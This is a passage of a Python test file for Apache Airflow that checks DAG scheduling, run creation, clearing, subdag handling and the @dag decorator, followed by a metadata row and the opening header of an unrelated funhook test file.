orm_dag = session.query(DagModel).filter(DagModel.dag_id == 'new_nonexisting_dag').one()
# Since the dag didn't exist before, it should follow the pause flag upon creation
assert orm_dag.is_paused
session.close()
def test_existing_dag_default_view(self):
with create_session() as session:
session.add(DagModel(dag_id='dag_default_view_old', default_view=None))
session.commit()
orm_dag = session.query(DagModel).filter(DagModel.dag_id == 'dag_default_view_old').one()
assert orm_dag.default_view is None
assert orm_dag.get_default_view() == conf.get('webserver', 'dag_default_view').lower()
def test_dag_is_deactivated_upon_dagfile_deletion(self):
dag_id = 'old_existing_dag'
dag_fileloc = "/usr/local/airflow/dags/non_existing_path.py"
dag = DAG(
dag_id,
is_paused_upon_creation=True,
)
dag.fileloc = dag_fileloc
session = settings.Session()
with mock.patch.object(settings, "STORE_DAG_CODE", False):
dag.sync_to_db(session=session)
orm_dag = session.query(DagModel).filter(DagModel.dag_id == dag_id).one()
assert orm_dag.is_active
assert orm_dag.fileloc == dag_fileloc
DagModel.deactivate_deleted_dags(list_py_file_paths(settings.DAGS_FOLDER))
orm_dag = session.query(DagModel).filter(DagModel.dag_id == dag_id).one()
assert not orm_dag.is_active
session.execute(DagModel.__table__.delete().where(DagModel.dag_id == dag_id))
session.close()
def test_dag_naive_default_args_start_date_with_timezone(self):
local_tz = pendulum.timezone('Europe/Zurich')
default_args = {'start_date': datetime.datetime(2018, 1, 1, tzinfo=local_tz)}
dag = DAG('DAG', default_args=default_args)
assert dag.timezone.name == local_tz.name
dag = DAG('DAG', default_args=default_args)
assert dag.timezone.name == local_tz.name
def test_roots(self):
"""Verify if dag.roots returns the root tasks of a DAG."""
with DAG("test_dag", start_date=DEFAULT_DATE) as dag:
op1 = DummyOperator(task_id="t1")
op2 = DummyOperator(task_id="t2")
op3 = DummyOperator(task_id="t3")
op4 = DummyOperator(task_id="t4")
op5 = DummyOperator(task_id="t5")
[op1, op2] >> op3 >> [op4, op5]
assert set(dag.roots) == {op1, op2}
def test_leaves(self):
"""Verify if dag.leaves returns the leaf tasks of a DAG."""
with DAG("test_dag", start_date=DEFAULT_DATE) as dag:
op1 = DummyOperator(task_id="t1")
op2 = DummyOperator(task_id="t2")
op3 = DummyOperator(task_id="t3")
op4 = DummyOperator(task_id="t4")
op5 = DummyOperator(task_id="t5")
[op1, op2] >> op3 >> [op4, op5]
assert set(dag.leaves) == {op4, op5}
def test_tree_view(self):
"""Verify correctness of dag.tree_view()."""
with DAG("test_dag", start_date=DEFAULT_DATE) as dag:
op1 = DummyOperator(task_id="t1")
op2 = DummyOperator(task_id="t2")
op3 = DummyOperator(task_id="t3")
op1 >> op2 >> op3
with redirect_stdout(io.StringIO()) as stdout:
dag.tree_view()
stdout = stdout.getvalue()
stdout_lines = stdout.split("\n")
assert 't1' in stdout_lines[0]
assert 't2' in stdout_lines[1]
assert 't3' in stdout_lines[2]
def test_duplicate_task_ids_not_allowed_with_dag_context_manager(self):
"""Verify tasks with Duplicate task_id raises error"""
with pytest.raises(DuplicateTaskIdFound, match="Task id 't1' has already been added to the DAG"):
with DAG("test_dag", start_date=DEFAULT_DATE) as dag:
op1 = DummyOperator(task_id="t1")
op2 = BashOperator(task_id="t1", bash_command="sleep 1")
op1 >> op2
assert dag.task_dict == {op1.task_id: op1}
def test_duplicate_task_ids_not_allowed_without_dag_context_manager(self):
"""Verify tasks with Duplicate task_id raises error"""
with pytest.raises(DuplicateTaskIdFound, match="Task id 't1' has already been added to the DAG"):
dag = DAG("test_dag", start_date=DEFAULT_DATE)
op1 = DummyOperator(task_id="t1", dag=dag)
op2 = DummyOperator(task_id="t1", dag=dag)
op1 >> op2
assert dag.task_dict == {op1.task_id: op1}
def test_duplicate_task_ids_for_same_task_is_allowed(self):
"""Verify that same tasks with Duplicate task_id do not raise error"""
with DAG("test_dag", start_date=DEFAULT_DATE) as dag:
op1 = op2 = DummyOperator(task_id="t1")
op3 = DummyOperator(task_id="t3")
op1 >> op3
op2 >> op3
assert op1 == op2
assert dag.task_dict == {op1.task_id: op1, op3.task_id: op3}
assert dag.task_dict == {op2.task_id: op2, op3.task_id: op3}
def test_sub_dag_updates_all_references_while_deepcopy(self):
with DAG("test_dag", start_date=DEFAULT_DATE) as dag:
op1 = DummyOperator(task_id='t1')
op2 = DummyOperator(task_id='t2')
op3 = DummyOperator(task_id='t3')
op1 >> op2
op2 >> op3
sub_dag = dag.partial_subset('t2', include_upstream=True, include_downstream=False)
assert id(sub_dag.task_dict['t1'].downstream_list[0].dag) == id(sub_dag)
# Copied DAG should not include unused task IDs in used_group_ids
assert 't3' not in sub_dag._task_group.used_group_ids
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag_id = "test_schedule_dag_no_previous_runs"
dag = DAG(dag_id=dag_id)
dag.add_task(BaseOperator(task_id="faketastic", owner='Also fake', start_date=TEST_DATE))
dag_run = dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=TEST_DATE,
state=State.RUNNING,
)
assert dag_run is not None
assert dag.dag_id == dag_run.dag_id
assert dag_run.run_id is not None
assert '' != dag_run.run_id
assert (
TEST_DATE == dag_run.execution_date
), f'dag_run.execution_date did not match expectation: {dag_run.execution_date}'
assert State.RUNNING == dag_run.state
assert not dag_run.external_trigger
dag.clear()
self._clean_up(dag_id)
@patch('airflow.models.dag.Stats')
def test_dag_handle_callback_crash(self, mock_stats):
"""
Tests avoid crashes from calling dag callbacks exceptions
"""
dag_id = "test_dag_callback_crash"
mock_callback_with_exception = mock.MagicMock()
mock_callback_with_exception.side_effect = Exception
dag = DAG(
dag_id=dag_id,
# callback with invalid signature should not cause crashes
on_success_callback=lambda: 1,
on_failure_callback=mock_callback_with_exception,
)
when = TEST_DATE
dag.add_task(BaseOperator(task_id="faketastic", owner='Also fake', start_date=when))
dag_run = dag.create_dagrun(State.RUNNING, when, run_type=DagRunType.MANUAL)
# should not raise any exception
dag.handle_callback(dag_run, success=False)
dag.handle_callback(dag_run, success=True)
mock_stats.incr.assert_called_with("dag.callback_exceptions")
dag.clear()
self._clean_up(dag_id)
def test_next_dagrun_after_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = datetime.timedelta(hours=1)
dag_id = "test_schedule_dag_fake_scheduled_previous"
dag = DAG(dag_id=dag_id, schedule_interval=delta, start_date=DEFAULT_DATE)
dag.add_task(BaseOperator(task_id="faketastic", owner='Also fake', start_date=DEFAULT_DATE))
dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True,
)
dag.sync_to_db()
with create_session() as session:
model = session.query(DagModel).get((dag.dag_id,))
# Even though there is a run for this date already, it is marked as manual/external, so we should
# create a scheduled one anyway!
assert model.next_dagrun == DEFAULT_DATE
assert model.next_dagrun_create_after == dag.following_schedule(DEFAULT_DATE)
self._clean_up(dag_id)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag_id = "test_schedule_dag_once"
dag = DAG(dag_id=dag_id)
dag.schedule_interval = '@once'
assert isinstance(dag.timetable, OnceTimetable)
dag.add_task(BaseOperator(task_id="faketastic", owner='Also fake', start_date=TEST_DATE))
# Sync once to create the DagModel
dag.sync_to_db()
dag.create_dagrun(run_type=DagRunType.SCHEDULED, execution_date=TEST_DATE, state=State.SUCCESS)
# Then sync again after creating the dag run -- this should update next_dagrun
dag.sync_to_db()
with create_session() as session:
model = session.query(DagModel).get((dag.dag_id,))
assert model.next_dagrun is None
assert model.next_dagrun_create_after is None
self._clean_up(dag_id)
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag_id = "test_fractional_seconds"
dag = DAG(dag_id=dag_id)
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(task_id="faketastic", owner='Also fake', start_date=TEST_DATE))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False,
)
run.refresh_from_db()
assert start_date == run.execution_date, "dag run execution_date loses precision"
assert start_date == run.start_date, "dag run start_date loses precision "
self._clean_up(dag_id)
def test_pickling(self):
test_dag_id = 'test_pickling'
args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
dag = DAG(test_dag_id, default_args=args)
dag_pickle = dag.pickle()
assert dag_pickle.pickle.dag_id == dag.dag_id
def test_rich_comparison_ops(self):
test_dag_id = 'test_rich_comparison_ops'
class DAGsubclass(DAG):
pass
args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
dag = DAG(test_dag_id, default_args=args)
dag_eq = DAG(test_dag_id, default_args=args)
dag_diff_load_time = DAG(test_dag_id, default_args=args)
dag_diff_name = DAG(test_dag_id + '_neq', default_args=args)
dag_subclass = DAGsubclass(test_dag_id, default_args=args)
dag_subclass_diff_name = DAGsubclass(test_dag_id + '2', default_args=args)
for dag_ in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
dag_.last_loaded = dag.last_loaded
# test identity equality
assert dag == dag
# test dag (in)equality based on _comps
assert dag_eq == dag
assert dag_diff_name != dag
assert dag_diff_load_time != dag
# test dag inequality based on type even if _comps happen to match
assert dag_subclass != dag
# a dag should equal an unpickled version of itself
dump = pickle.dumps(dag)
assert pickle.loads(dump) == dag
# dags are ordered based on dag_id no matter what the type is
assert dag < dag_diff_name
assert dag > dag_diff_load_time
assert dag < dag_subclass_diff_name
# greater than should have been created automatically by functools
assert dag_diff_name > dag
# hashes are non-random and match equality
assert hash(dag) == hash(dag)
assert hash(dag_eq) == hash(dag)
assert hash(dag_diff_name) != hash(dag)
assert hash(dag_subclass) != hash(dag)
def test_get_paused_dag_ids(self):
dag_id = "test_get_paused_dag_ids"
dag = DAG(dag_id, is_paused_upon_creation=True)
dag.sync_to_db()
assert DagModel.get_dagmodel(dag_id) is not None
paused_dag_ids = DagModel.get_paused_dag_ids([dag_id])
assert paused_dag_ids == {dag_id}
with create_session() as session:
session.query(DagModel).filter(DagModel.dag_id == dag_id).delete(synchronize_session=False)
@parameterized.expand(
[
(None, NullTimetable()),
("@daily", cron_timetable("0 0 * * *")),
("@weekly", cron_timetable("0 0 * * 0")),
("@monthly", cron_timetable("0 0 1 * *")),
("@quarterly", cron_timetable("0 0 1 */3 *")),
("@yearly", cron_timetable("0 0 1 1 *")),
("@once", OnceTimetable()),
(datetime.timedelta(days=1), delta_timetable(datetime.timedelta(days=1))),
]
)
def test_timetable(self, schedule_interval, expected_timetable):
dag = DAG("test_schedule_interval", schedule_interval=schedule_interval)
assert dag.timetable == expected_timetable
assert dag.schedule_interval == schedule_interval
def test_create_dagrun_run_id_is_generated(self):
dag = DAG(dag_id="run_id_is_generated")
dr = dag.create_dagrun(run_type=DagRunType.MANUAL, execution_date=DEFAULT_DATE, state=State.NONE)
assert dr.run_id == f"manual__{DEFAULT_DATE.isoformat()}"
def test_create_dagrun_run_type_is_obtained_from_run_id(self):
dag = DAG(dag_id="run_type_is_obtained_from_run_id")
dr = dag.create_dagrun(run_id="scheduled__", state=State.NONE)
assert dr.run_type == DagRunType.SCHEDULED
dr = dag.create_dagrun(run_id="custom_is_set_to_manual", state=State.NONE)
assert dr.run_type == DagRunType.MANUAL
def test_create_dagrun_job_id_is_set(self):
job_id = 42
dag = DAG(dag_id="test_create_dagrun_job_id_is_set")
dr = dag.create_dagrun(
run_id="test_create_dagrun_job_id_is_set", state=State.NONE, creating_job_id=job_id
)
assert dr.creating_job_id == job_id
@parameterized.expand(
[
(State.NONE,),
(State.RUNNING,),
]
)
def test_clear_set_dagrun_state(self, dag_run_state):
dag_id = 'test_clear_set_dagrun_state'
self._clean_up(dag_id)
task_id = 't1'
dag = DAG(dag_id, start_date=DEFAULT_DATE, max_active_runs=1)
t_1 = DummyOperator(task_id=task_id, dag=dag)
session = settings.Session()
dagrun_1 = dag.create_dagrun(
run_type=DagRunType.BACKFILL_JOB,
state=State.FAILED,
start_date=DEFAULT_DATE,
execution_date=DEFAULT_DATE,
)
session.merge(dagrun_1)
task_instance_1 = TI(t_1, execution_date=DEFAULT_DATE, state=State.RUNNING)
session.merge(task_instance_1)
session.commit()
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
dag_run_state=dag_run_state,
include_subdags=False,
include_parentdag=False,
session=session,
)
dagruns = (
session.query(
DagRun,
)
.filter(
DagRun.dag_id == dag_id,
)
.all()
)
assert len(dagruns) == 1
dagrun = dagruns[0] # type: DagRun
assert dagrun.state == dag_run_state
def _make_test_subdag(self, session):
dag_id = 'test_subdag'
self._clean_up(dag_id)
task_id = 't1'
dag = DAG(dag_id, start_date=DEFAULT_DATE, max_active_runs=1)
t_1 = DummyOperator(task_id=task_id, dag=dag)
subdag = DAG(dag_id + '.test', start_date=DEFAULT_DATE, max_active_runs=1)
SubDagOperator(task_id='test', subdag=subdag, dag=dag)
t_2 = DummyOperator(task_id='task', dag=subdag)
subdag.parent_dag = dag
subdag.is_subdag = True
dag.sync_to_db()
session = settings.Session()
dag.create_dagrun(
run_type=DagRunType.MANUAL,
state=State.FAILED,
start_date=DEFAULT_DATE,
execution_date=DEFAULT_DATE,
session=session,
)
subdag.create_dagrun(
run_type=DagRunType.MANUAL,
state=State.FAILED,
start_date=DEFAULT_DATE,
execution_date=DEFAULT_DATE,
session=session,
)
task_instance_1 = TI(t_1, execution_date=DEFAULT_DATE, state=State.RUNNING)
task_instance_2 = TI(t_2, execution_date=DEFAULT_DATE, state=State.RUNNING)
session.merge(task_instance_1)
session.merge(task_instance_2)
return dag, subdag
@parameterized.expand(
[
(State.NONE,),
(State.RUNNING,),
]
)
def test_clear_set_dagrun_state_for_subdag(self, dag_run_state):
session = settings.Session()
dag, subdag = self._make_test_subdag(session)
session.flush()
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
dag_run_state=dag_run_state,
include_subdags=True,
include_parentdag=False,
session=session,
)
dagrun = (
session.query(
DagRun,
)
.filter(DagRun.dag_id == subdag.dag_id)
.one()
)
assert dagrun.state == dag_run_state
session.rollback()
@parameterized.expand(
[
(State.NONE,),
(State.RUNNING,),
]
)
def test_clear_set_dagrun_state_for_parent_dag(self, dag_run_state):
session = settings.Session()
dag, subdag = self._make_test_subdag(session)
session.flush()
subdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
dag_run_state=dag_run_state,
include_subdags=True,
include_parentdag=True,
session=session,
)
dagrun = (
session.query(
DagRun,
)
.filter(DagRun.dag_id == dag.dag_id)
.one()
)
assert dagrun.state == dag_run_state
@parameterized.expand(
[(state, State.NONE) for state in State.task_states if state != State.RUNNING]
+ [(State.RUNNING, State.SHUTDOWN)]
) # type: ignore
def test_clear_dag(self, ti_state_begin, ti_state_end: Optional[str]):
dag_id = 'test_clear_dag'
self._clean_up(dag_id)
task_id = 't1'
dag = DAG(dag_id, start_date=DEFAULT_DATE, max_active_runs=1)
t_1 = DummyOperator(task_id=task_id, dag=dag)
session = settings.Session() # type: ignore
dagrun_1 = dag.create_dagrun(
run_type=DagRunType.BACKFILL_JOB,
state=State.RUNNING,
start_date=DEFAULT_DATE,
execution_date=DEFAULT_DATE,
)
session.merge(dagrun_1)
task_instance_1 = TI(t_1, execution_date=DEFAULT_DATE, state=ti_state_begin)
task_instance_1.job_id = 123
session.merge(task_instance_1)
session.commit()
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
session=session,
)
task_instances = (
session.query(
TI,
)
.filter(
TI.dag_id == dag_id,
)
.all()
)
assert len(task_instances) == 1
task_instance = task_instances[0] # type: TI
assert task_instance.state == ti_state_end
self._clean_up(dag_id)
def test_next_dagrun_info_once(self):
dag = DAG(
'test_scheduler_dagrun_once', start_date=timezone.datetime(2015, 1, 1), schedule_interval="@once"
)
next_date, _ = dag.next_dagrun_info(None)
assert next_date == timezone.datetime(2015, 1, 1)
next_date, _ = dag.next_dagrun_info(next_date)
assert next_date is None
def test_next_dagrun_info_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = datetime.timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag_id = "test_schedule_dag_start_end_dates"
dag = DAG(dag_id=dag_id, start_date=start_date, end_date=end_date, schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
# Create and schedule the dag runs
dates = []
date = None
for _ in range(runs):
date, _ = dag.next_dagrun_info(date)
dates.append(date)
for date in dates:
assert date is not None
assert dates[-1] == end_date
assert dag.next_dagrun_info(date)[0] is None
def test_next_dagrun_info_catchup(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
def make_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
}
dag = DAG(
dag_id,
schedule_interval=schedule_interval,
start_date=start_date,
catchup=catchup,
default_args=default_args,
)
op1 = DummyOperator(task_id='t1', dag=dag)
op2 = DummyOperator(task_id='t2', dag=dag)
op3 = DummyOperator(task_id='t3', dag=dag)
op1 >> op2 >> op3
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0
)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
dag1 = make_dag(
dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False,
)
next_date, _ = dag1.next_dagrun_info(None)
# The DR should be scheduled in the last half an hour, not 6 hours ago
assert next_date > half_an_hour_ago
assert next_date < timezone.utcnow()
dag2 = make_dag(
dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False,
)
next_date, _ = dag2.next_dagrun_info(None)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
assert next_date > two_hours_ago
# The DR should be scheduled BEFORE now
assert next_date < timezone.utcnow()
dag3 = make_dag(
dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False,
)
next_date, _ = dag3.next_dagrun_info(None)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
assert next_date == six_hours_ago_to_the_hour
@freeze_time(timezone.datetime(2020, 1, 5))
def test_next_dagrun_info_timedelta_schedule_and_catchup_false(self):
"""
Test that the dag file processor does not create multiple dagruns
if a dag is scheduled with 'timedelta' and catchup=False
"""
dag = DAG(
'test_scheduler_dagrun_once_with_timedelta_and_catchup_false',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval=timedelta(days=1),
catchup=False,
)
next_date, _ = dag.next_dagrun_info(None)
assert next_date == timezone.datetime(2020, 1, 4)
# The date to create is in the future, this is handled by "DagModel.dags_needing_dagruns"
next_date, _ = dag.next_dagrun_info(next_date)
assert next_date == timezone.datetime(2020, 1, 5)
@freeze_time(timezone.datetime(2020, 5, 4))
def test_next_dagrun_info_timedelta_schedule_and_catchup_true(self):
"""
Test that the dag file processor creates multiple dagruns
if a dag is scheduled with 'timedelta' and catchup=True
"""
dag = DAG(
'test_scheduler_dagrun_once_with_timedelta_and_catchup_true',
start_date=timezone.datetime(2020, 5, 1),
schedule_interval=timedelta(days=1),
catchup=True,
)
next_date, _ = dag.next_dagrun_info(None)
assert next_date == timezone.datetime(2020, 5, 1)
next_date, _ = dag.next_dagrun_info(next_date)
assert next_date == timezone.datetime(2020, 5, 2)
next_date, _ = dag.next_dagrun_info(next_date)
assert next_date == timezone.datetime(2020, 5, 3)
# The date to create is in the future, this is handled by "DagModel.dags_needing_dagruns"
next_date, _ = dag.next_dagrun_info(next_date)
assert next_date == timezone.datetime(2020, 5, 4)
def test_next_dagrun_after_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *",
)
DummyOperator(task_id='dummy', dag=dag, owner='airflow')
next_date, _ = dag.next_dagrun_info(None)
assert next_date == timezone.datetime(2016, 1, 2, 5, 4)
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *",
)
DummyOperator(task_id='dummy', dag=dag, owner='airflow')
next_date, _ = dag.next_dagrun_info(None)
assert next_date == timezone.datetime(2016, 1, 1, 10, 10)
def test_next_dagrun_after_not_for_subdags(self):
"""
Test the subdags are never marked to have dagruns created, as they are
handled by the SubDagOperator, not the scheduler
"""
def subdag(parent_dag_name, child_dag_name, args):
"""
Create a subdag.
"""
dag_subdag = DAG(
dag_id=f'{parent_dag_name}.{child_dag_name}',
schedule_interval="@daily",
default_args=args,
)
for i in range(2):
DummyOperator(task_id=f'{child_dag_name}-task-{i + 1}', dag=dag_subdag)
return dag_subdag
with DAG(
dag_id='test_subdag_operator',
start_date=datetime.datetime(2019, 1, 1),
max_active_runs=1,
schedule_interval=timedelta(minutes=1),
) as dag:
section_1 = SubDagOperator(
task_id='section-1',
subdag=subdag(dag.dag_id, 'section-1', {'start_date': dag.start_date}),
)
subdag = section_1.subdag
# parent_dag and is_subdag was set by DagBag. We don't use DagBag, so this value is not set.
subdag.parent_dag = dag
subdag.is_subdag = True
next_date, _ = dag.next_dagrun_info(None)
assert next_date == timezone.datetime(2019, 1, 1, 0, 0)
next_subdag_date, _ = subdag.next_dagrun_info(None)
assert next_subdag_date is None, "SubDags should never have DagRuns created by the scheduler"
def test_replace_outdated_access_control_actions(self):
outdated_permissions = {
'role1': {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT},
'role2': {permissions.DEPRECATED_ACTION_CAN_DAG_READ, permissions.DEPRECATED_ACTION_CAN_DAG_EDIT},
}
updated_permissions = {
'role1': {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT},
'role2': {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT},
}
with pytest.warns(DeprecationWarning):
dag = DAG(dag_id='dag_with_outdated_perms', access_control=outdated_permissions)
assert dag.access_control == updated_permissions
with pytest.warns(DeprecationWarning):
dag.access_control = outdated_permissions
assert dag.access_control == updated_permissions
class TestDagModel:
def test_dags_needing_dagruns_not_too_early(self):
dag = DAG(dag_id='far_future_dag', start_date=timezone.datetime(2038, 1, 1))
DummyOperator(task_id='dummy', dag=dag, owner='airflow')
session = settings.Session()
orm_dag = DagModel(
dag_id=dag.dag_id,
max_active_tasks=1,
has_task_concurrency_limits=False,
next_dagrun=dag.start_date,
next_dagrun_create_after=timezone.datetime(2038, 1, 2),
is_active=True,
)
session.add(orm_dag)
session.flush()
dag_models = DagModel.dags_needing_dagruns(session).all()
assert dag_models == []
session.rollback()
session.close()
def test_dags_needing_dagruns_only_unpaused(self):
"""
We should never create dagruns for unpaused DAGs
"""
dag = DAG(dag_id='test_dags', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag, owner='airflow')
session = settings.Session()
orm_dag = DagModel(
dag_id=dag.dag_id,
has_task_concurrency_limits=False,
next_dagrun=dag.start_date,
next_dagrun_create_after=dag.following_schedule(DEFAULT_DATE),
is_active=True,
)
session.add(orm_dag)
session.flush()
needed = DagModel.dags_needing_dagruns(session).all()
assert needed == [orm_dag]
orm_dag.is_paused = True
session.flush()
dag_models = DagModel.dags_needing_dagruns(session).all()
assert dag_models == []
session.rollback()
session.close()
class TestQueries(unittest.TestCase):
def setUp(self) -> None:
clear_db_runs()
def tearDown(self) -> None:
clear_db_runs()
@parameterized.expand(
[
(3,),
(12,),
]
)
def test_count_number_queries(self, tasks_count):
dag = DAG('test_dagrun_query_count', start_date=DEFAULT_DATE)
for i in range(tasks_count):
DummyOperator(task_id=f'dummy_task_{i}', owner='test', dag=dag)
with assert_queries_count(2):
dag.create_dagrun(
run_id="test_dagrun_query_count",
state=State.RUNNING,
execution_date=TEST_DATE,
)
class TestDagDecorator(unittest.TestCase):
DEFAULT_ARGS = {
"owner": "test",
"depends_on_past": True,
"start_date": timezone.utcnow(),
"retries": 1,
"retry_delay": timedelta(minutes=1),
}
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
VALUE = 42
def setUp(self):
super().setUp()
self.operator = None
def tearDown(self):
super().tearDown()
clear_db_runs()
def test_fileloc(self):
@dag_decorator(default_args=self.DEFAULT_ARGS)
def noop_pipeline():
...
dag = noop_pipeline()
assert isinstance(dag, DAG)
assert dag.dag_id, 'noop_pipeline'
assert dag.fileloc == __file__
def test_set_dag_id(self):
"""Test that checks you can set dag_id from decorator."""
@dag_decorator('test', default_args=self.DEFAULT_ARGS)
def noop_pipeline():
@task_decorator
def return_num(num):
return num
return_num(4)
dag = noop_pipeline()
assert isinstance(dag, DAG)
assert dag.dag_id, 'test'
def test_default_dag_id(self):
"""Test that @dag uses function name as default dag id."""
@dag_decorator(default_args=self.DEFAULT_ARGS)
def noop_pipeline():
@task_decorator
def return_num(num):
return num
return_num(4)
dag = noop_pipeline()
assert isinstance(dag, DAG)
assert dag.dag_id, 'noop_pipeline'
def test_documentation_added(self):
"""Test that @dag uses function docs as doc_md for DAG object"""
@dag_decorator(default_args=self.DEFAULT_ARGS)
def noop_pipeline():
"""
Regular DAG documentation
"""
@task_decorator
def return_num(num):
return num
return_num(4)
dag = noop_pipeline()
assert isinstance(dag, DAG)
assert dag.dag_id, 'test'
assert dag.doc_md.strip(), "Regular DAG documentation"
def test_fails_if_arg_not_set(self):
"""Test that @dag decorated function fails if positional argument is not set"""
@dag_decorator(default_args=self.DEFAULT_ARGS)
def noop_pipeline(value):
@task_decorator
def return_num(num):
return num
return_num(value)
# Test that if arg is not passed it raises a type error as expected.
with pytest.raises(TypeError):
noop_pipeline()
def test_dag_param_resolves(self):
"""Test that dag param is correctly resolved by operator"""
@dag_decorator(default_args=self.DEFAULT_ARGS)
def xcom_pass_to_op(value=self.VALUE):
@task_decorator
def return_num(num):
return num
xcom_arg = return_num(value)
self.operator = xcom_arg.operator
dag = xcom_pass_to_op()
dr = dag.create_dagrun(
run_id=DagRunType.MANUAL.value,
start_date=timezone.utcnow(),
execution_date=self.DEFAULT_DATE,
state=State.RUNNING,
)
self.operator.run(start_date=self.DEFAULT_DATE, end_date=self.DEFAULT_DATE)
ti = dr.get_task_instances()[0]
assert ti.xcom_pull() == self.VALUE
def test_dag_param_dagrun_parameterized(self):
"""Test that dag param is correctly overwritten when set in dag run"""
@dag_decorator(default_args=self.DEFAULT_ARGS)
def xcom_pass_to_op(value=self.VALUE):
@task_decorator
def return_num(num):
return num
assert isinstance(value, DagParam)
xcom_arg = return_num(value)
self.operator = xcom_arg.operator
dag = xcom_pass_to_op()
new_value = 52
dr = dag.create_dagrun(
run_id=DagRunType.MANUAL.value,
start_date=timezone.utcnow(),
execution_date=self.DEFAULT_DATE,
state=State.RUNNING,
conf={'value': new_value},
)
self.operator.run(start_date=self.DEFAULT_DATE, end_date=self.DEFAULT_DATE)
ti = dr.get_task_instances()[0]
assert ti.xcom_pull(), new_value
def test_set_params_for_dag(self):
"""Test that dag param is correctly set when using dag decorator"""
@dag_decorator(default_args=self.DEFAULT_ARGS)
def xcom_pass_to_op(value=self.VALUE):
@task_decorator
def return_num(num):
return num
xcom_arg = return_num(value)
self.operator = xcom_arg.operator
dag = xcom_pass_to_op()
assert dag.params['value'] == self.VALUE
def test_set_task_instance_state():
"""Test that set_task_instance_state updates the TaskInstance state and clear downstream failed"""
start_date = datetime_tz(2020, 1, 1)
with DAG("test_set_task_instance_state", start_date=start_date) as dag:
task_1 = DummyOperator(task_id="task_1")
task_2 = DummyOperator(task_id="task_2")
task_3 = DummyOperator(task_id="task_3")
task_4 = DummyOperator(task_id="task_4")
task_5 = DummyOperator(task_id="task_5")
task_1 >> [task_2, task_3, task_4, task_5]
dagrun = dag.create_dagrun(
start_date=start_date, execution_date=start_date, state=State.FAILED, run_type=DagRunType.SCHEDULED
)
def get_task_instance(session, task):
return (
session.query(TI)
.filter(
TI.dag_id == dag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == start_date,
)
.one()
)
with create_session() as session:
get_task_instance(session, task_1).state = State.FAILED
get_task_instance(session, task_2).state = State.SUCCESS
get_task_instance(session, task_3).state = State.UPSTREAM_FAILED
get_task_instance(session, task_4).state = State.FAILED
get_task_instance(session, task_5).state = State.SKIPPED
session.commit()
altered = dag.set_task_instance_state(
task_id=task_1.task_id, execution_date=start_date, state=State.SUCCESS
)
with create_session() as session:
# After _mark_task_instance_state, task_1 is marked as SUCCESS
assert get_task_instance(session, task_1).state == State.SUCCESS
# task_2 remains as SUCCESS
assert get_task_instance(session, task_2).state == State.SUCCESS
# task_3 and task_4 are cleared because they were in FAILED/UPSTREAM_FAILED state
assert get_task_instance(session, task_3).state == State.NONE
assert get_task_instance(session, task_4).state == State.NONE
# task_5 remains as SKIPPED
assert get_task_instance(session, task_5).state == State.SKIPPED
dagrun.refresh_from_db(session=session)
# dagrun should be set to QUEUED
assert dagrun.get_state() == State.QUEUED
assert {t.key for t in altered} == {('test_set_task_instance_state', 'task_1', start_date, 1)}
| apache-2.0 | 1,359,036,358,921,159,700 | 35.737729 | 110 | 0.582928 | false |
mission-liao/pyfunhook | funhook/test/builtin/cls/inherit.py | 1 | 2697 | '''
Created on Jul 26, 2013
@author: Mission Liao
'''
import unittest
import funhook
from funhook.builtin.cls import adapt_hook_from
